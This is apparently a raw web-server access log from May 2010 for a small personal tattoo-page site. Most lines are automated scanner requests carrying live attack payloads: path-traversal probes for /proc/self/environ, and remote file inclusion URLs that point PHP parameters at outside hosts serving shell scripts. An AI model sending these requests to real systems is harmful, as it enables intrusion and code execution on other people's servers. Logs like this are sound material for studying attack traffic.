174.121.59.218 - - [25/May/2010:00:48:49 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
174.121.59.218 - - [25/May/2010:00:48:49 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:49:08 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:49:08 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
67.227.143.132 - - [25/May/2010:00:49:09 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
58.230.162.220 - - [25/May/2010:00:50:50 -0500] "GET /logs///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:50:50 -0500] "GET ///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
58.230.162.220 - - [25/May/2010:00:50:50 -0500] "GET /logs/access_log.1271548800///appserv/main.php?appserv_root=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:00:51:59 -0500] "GET /logs/access_log.1268870400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.211.113.71 - - [25/May/2010:00:53:40 -0500] "GET /logs/access_log.1274313600/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.813"
91.211.113.71 - - [25/May/2010:00:53:40 -0500] "GET /index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.813"
91.211.113.71 - - [25/May/2010:00:53:41 -0500] "GET /logs/index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.813"
82.103.136.15 - - [25/May/2010:00:55:00 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.vincenttractors.co.uk/images/cache/sh.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
82.103.136.15 - - [25/May/2010:00:55:01 -0500] "GET /phphtml.php?htmlclass_path=http://www.vincenttractors.co.uk/images/cache/sh.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
84.40.30.37 - - [25/May/2010:00:55:24 -0500] "GET /logs/access_log.1271548800//bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:00:55:24 -0500] "GET //bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:00:55:32 -0500] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:00:56:10 -0500] "GET //bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:00:56:12 -0500] "GET /logs/access_log.1271548800//bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:00:56:12 -0500] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:00:56:37 -0500] "GET /?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:00:56:37 -0500] "GET /logs/?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 200 6908 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:00:56:37 -0500] "GET /logs/access_log.1270512000/?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
200.125.196.34 - - [25/May/2010:00:58:07 -0500] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
200.125.196.34 - - [25/May/2010:00:58:07 -0500] "GET //index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
84.40.30.37 - - [25/May/2010:01:02:28 -0500] "GET //bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 313 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:01:02:29 -0500] "GET /logs//bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
84.40.30.37 - - [25/May/2010:01:02:29 -0500] "GET /logs/access_log.1272326400//bbs/skin/zero_vote/login.php?dir=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:01:03:06 -0500] "GET /logs/access_log.1216252800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.55.146.200 - - [25/May/2010:01:03:56 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:01:03:56 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:01:03:56 -0500] "GET /logs/access_log.1223683200//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
188.40.137.140 - - [25/May/2010:01:05:19 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:05:19 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:05:20 -0500] "GET /phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:01:06:48 -0500] "GET /logs/access_log.1271548800/?sourcedir=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:07:02 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:07:03 -0500] "GET /phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:07:03 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:07:31 -0500] "GET /phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:07:31 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
188.40.137.140 - - [25/May/2010:01:07:31 -0500] "GET /logs/access_log.1271548800/phphtml.php?htmlclass_path=http://www.nsi.or.kr/technote7/manual_html/id1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
119.235.237.16 - - [25/May/2010:01:07:37 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
119.235.237.16 - - [25/May/2010:01:07:38 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
82.103.136.15 - - [25/May/2010:01:08:27 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.vincenttractors.co.uk/images/cache/sh.jpg? HTTP/1.1" 404 300 "-""libwww-perl/5.831"
82.103.136.15 - - [25/May/2010:01:08:27 -0500] "GET /phphtml.php?htmlclass_path=http://www.vincenttractors.co.uk/images/cache/sh.jpg? HTTP/1.1" 404 295 "-""libwww-perl/5.831"
207.46.13.53 - - [25/May/2010:01:21:01 -0500] "GET /logs/access_log.1212451200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.27.53.238 - - [25/May/2010:01:21:32 -0500] "GET /logs//components/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:01:21:32 -0500] "GET /logs/access_log.1271548800//components/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:01:21:32 -0500] "GET //components/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:01:21:34 -0500] "GET //components/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 306 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:01:21:34 -0500] "GET /logs//components/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.27.53.238 - - [25/May/2010:01:21:34 -0500] "GET /logs/access_log.1271548800//components/errors.php?error=http://www.howtolisten.kr/lct/exam3/81/auto1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.250.255.243 - - [25/May/2010:01:21:35 -0500] "GET /logs/access_log.1259625600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
91.186.27.166 - - [25/May/2010:01:21:55 -0500] "GET /logs/index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
91.186.27.166 - - [25/May/2010:01:21:56 -0500] "GET /index.php?option=com_spsnewsletter&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
195.190.166.35 - - [25/May/2010:01:27:31 -0500] "GET /logs//components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hotel.luzhniki.ru//components/id.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.65"
195.190.166.35 - - [25/May/2010:01:27:31 -0500] "GET //components/com_zoom/classes/iptc/EXIF.php?mosConfig_absolute_path=http://hotel.luzhniki.ru//components/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.65"
72.55.146.200 - - [25/May/2010:01:28:16 -0500] "GET //administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
72.55.146.200 - - [25/May/2010:01:28:16 -0500] "GET /logs//administrator/index2.php?mosConfig_absolute_path=http://www.agio.it/zero100/id.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
119.63.198.40 - - [25/May/2010:01:30:41 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
207.46.204.235 - - [25/May/2010:01:31:00 -0500] "GET /logs/access_log.1164240000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
66.249.71.144 - - [25/May/2010:01:31:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.144 - - [25/May/2010:01:31:38 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
207.46.195.231 - - [25/May/2010:01:35:00 -0500] "GET /logs/access_log.1218326400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.136.121.230 - - [25/May/2010:01:36:50 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
75.136.121.230 - - [25/May/2010:01:36:50 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
75.136.121.230 - - [25/May/2010:01:36:50 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
92.48.207.112 - - [25/May/2010:01:39:33 -0500] "GET //components/com_flyspray/startdown.php?file=http://tjdhosp.co.kr/data/session/byz9991.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
89.212.236.114 - - [25/May/2010:01:41:09 -0500] "GET /index.php?option=com_user&view=reset&layout=confirm HTTP/1.1" 404 293 "-""libwww-perl/5.808"
75.136.121.230 - - [25/May/2010:01:42:05 -0500] "GET /logs/access_log.1271548800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
98.247.225.99 - - [25/May/2010:01:42:28 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=29&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%2Btattoo%26start%3D21%26um%3D1%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26hs%3DCoT%26sa%3DN%26rls%3Dorg.mozilla:en-US:official%26ndsp%3D21%26tbs%3Disch:1""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
98.247.225.99 - - [25/May/2010:01:42:29 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
98.247.225.99 - - [25/May/2010:01:42:29 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://www.google.com/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat_1st.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo1.htm&usg=__HklT9srLH8wLyGqhs0tqD9q2M-0=&h=228&w=271&sz=17&hl=en&start=29&um=1&itbs=1&tbnid=4MDwc_2CKpvGqM:&tbnh=95&tbnw=113&prev=/images%3Fq%3Dbert%2Bgrimm%2Btattoo%26start%3D21%26um%3D1%26hl%3Den%26safe%3Doff%26client%3Dfirefox-a%26hs%3DCoT%26sa%3DN%26rls%3Dorg.mozilla:en-US:official%26ndsp%3D21%26tbs%3Disch:1""Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2b5) Gecko/20091204 Firefox/3.6b5"
200.43.180.250 - - [25/May/2010:01:42:42 -0500] "GET /logs//components/com_akolegal.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.834"
200.43.180.250 - - [25/May/2010:01:42:42 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
200.43.180.250 - - [25/May/2010:01:42:42 -0500] "GET //components/com_akolegal.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.834"
200.43.180.250 - - [25/May/2010:01:42:42 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
94.23.60.216 - - [25/May/2010:01:43:06 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
94.23.60.216 - - [25/May/2010:01:43:06 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
94.23.60.216 - - [25/May/2010:01:43:07 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
75.136.121.230 - - [25/May/2010:01:46:13 -0500] "GET /logs/access_log.1273363200/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
87.119.196.31 - - [25/May/2010:01:46:16 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.119.196.31 - - [25/May/2010:01:46:16 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.119.196.31 - - [25/May/2010:01:46:16 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
87.119.196.31 - - [25/May/2010:01:47:12 -0500] "GET /logs/access_log.1273363200//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.803"
87.119.196.31 - - [25/May/2010:01:47:13 -0500] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.803"
87.119.196.31 - - [25/May/2010:01:47:13 -0500] "GET /logs//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.803"
77.72.200.38 - - [25/May/2010:01:49:49 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
87.250.255.243 - - [25/May/2010:01:51:11 -0500] "GET /logs/access_log.1178064000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
72.30.142.216 - - [25/May/2010:01:51:19 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [25/May/2010:01:51:20 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
112.216.153.186 - - [25/May/2010:01:53:18 -0500] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
112.216.153.186 - - [25/May/2010:01:53:18 -0500] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
112.216.153.186 - - [25/May/2010:01:53:18 -0500] "GET /logs/access_log.1271721600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.249.71.144 - - [25/May/2010:01:53:21 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 304 - "-""Googlebot-Image/1.0"
200.43.180.250 - - [25/May/2010:01:53:26 -0500] "GET /logs//index.php?option=com_akolegal&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
200.43.180.250 - - [25/May/2010:01:53:27 -0500] "GET //index.php?option=com_akolegal&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
112.216.153.186 - - [25/May/2010:01:53:39 -0500] "GET /logs/access_log.1262649600//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://phamsight.com/docs/images/head??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
77.72.200.38 - - [25/May/2010:01:54:50 -0500] "GET /logs/access_log.1273363200/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
77.72.200.38 - - [25/May/2010:01:54:50 -0500] "GET /*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 289 "-""libwww-perl/5.834"
77.72.200.38 - - [25/May/2010:01:54:51 -0500] "GET /logs/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
77.72.200.38 - - [25/May/2010:01:55:37 -0500] "GET /logs/access_log.1273017600/*.php?option=com_gcalendar&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 316 "-""libwww-perl/5.834"
91.192.168.241 - - [25/May/2010:01:58:32 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:01:58:32 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:01:58:32 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:01:58:45 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:01:58:45 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:01:58:45 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
75.136.121.230 - - [25/May/2010:01:59:30 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
75.136.121.230 - - [25/May/2010:01:59:30 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
75.136.121.230 - - [25/May/2010:01:59:30 -0500] "GET /logs/access_log.1273363200%20%20/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:02:00:20 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:02:00:20 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
91.192.168.241 - - [25/May/2010:02:00:20 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://forum.c4evn.org/id1.txt? HTTP/1.1" 404 357 "-""Mozilla/5.0"
121.78.118.123 - - [25/May/2010:02:01:19 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:02:48 -0500] "GET /logs/index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:02:49 -0500] "GET /index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:03:07 -0500] "GET /logs/index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:03:08 -0500] "GET /index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:03:11 -0500] "GET /logs/index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:03:12 -0500] "GET /index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
109.72.86.6 - - [25/May/2010:02:03:32 -0500] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:02:03:32 -0500] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
109.72.86.6 - - [25/May/2010:02:03:32 -0500] "GET /logs/access_log.1271548800//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.bdkorea.org/zeroboard/data/bangla01/zd1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
58.125.181.214 - - [25/May/2010:02:03:37 -0500] "GET /logs/index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.125.181.214 - - [25/May/2010:02:03:38 -0500] "GET /index.php?option=com_bsq_sitestats&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
75.136.121.230 - - [25/May/2010:02:04:46 -0500] "GET /logs/access_log.1271548800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
64.62.251.26 - - [25/May/2010:02:04:55 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.62.251.26 - - [25/May/2010:02:04:55 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.62.251.26 - - [25/May/2010:02:04:56 -0500] "GET /logs/access_log.1273363200%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
